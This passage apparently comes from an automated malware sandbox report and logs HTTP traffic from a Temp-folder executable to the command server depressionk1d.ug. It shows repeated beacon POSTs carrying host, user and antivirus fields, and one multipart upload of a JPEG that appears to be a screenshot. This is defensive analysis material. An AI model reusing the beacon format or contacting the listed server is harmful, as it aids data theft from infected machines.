74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:07.102334023 CET10470INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          243192.168.2.450055178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:07.366317034 CET10472OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:07.388889074 CET10474INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:07 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:07.388905048 CET10474INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          244192.168.2.450056178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:08.699569941 CET10475OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:08.725644112 CET10475INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:08 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          245192.168.2.450057178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:09.057308912 CET10476OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:09.079835892 CET10477INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:09 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:09.079843998 CET10478INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          246192.168.2.450059178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:09.220449924 CET10479OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:09.246651888 CET10479INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:09 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          247192.168.2.450060178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:09.377106905 CET10481OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:09.377274990 CET10481OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:09.377520084 CET10491OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:09.377737999 CET10494OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:09.400348902 CET10497OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:09.400393963 CET10500OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:24:09.400427103 CET10508OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:24:09.400460958 CET10515OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:24:09.400511026 CET10517OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:24:09.400532961 CET10520OUTData Raw: 8c 52 f9 c3 f8 51 45 17 64 ba 9e 45 41 1c a7 a2 13 f8 54 8b 6f 31 fe 1c 7d 6a 73 33 f6 c0 a6 99 1f fb c6 8d 49 e7 6c 05 ab 77 75 1f 8d 3c 5b a0 eb 27 e5 51 ee 3e b4 80 d3 b3 25 dd 96 36 40 a7 ef 13 4e df 0a f4 50 6a b6 68 a3 90 9b 16 85 d0 1f 75
                          Data Ascii: RQEdEATo1}js3Ilwu<['Q>%6@NPjhuU\^#,{~`4#7V'QG${*5<_[W/V.>Cd;1^!gGF=nl5}NPF;m)hV(\$|.<oZO7Z$dW
                          Nov 12, 2021 22:24:09.422982931 CET10523OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:24:09.472786903 CET10592INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:09 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          248192.168.2.450061178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:09.388570070 CET10494OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:09.415051937 CET10520INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:09 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          249192.168.2.450063178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:09.547374964 CET10594OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:09.577625990 CET10594INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:09 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
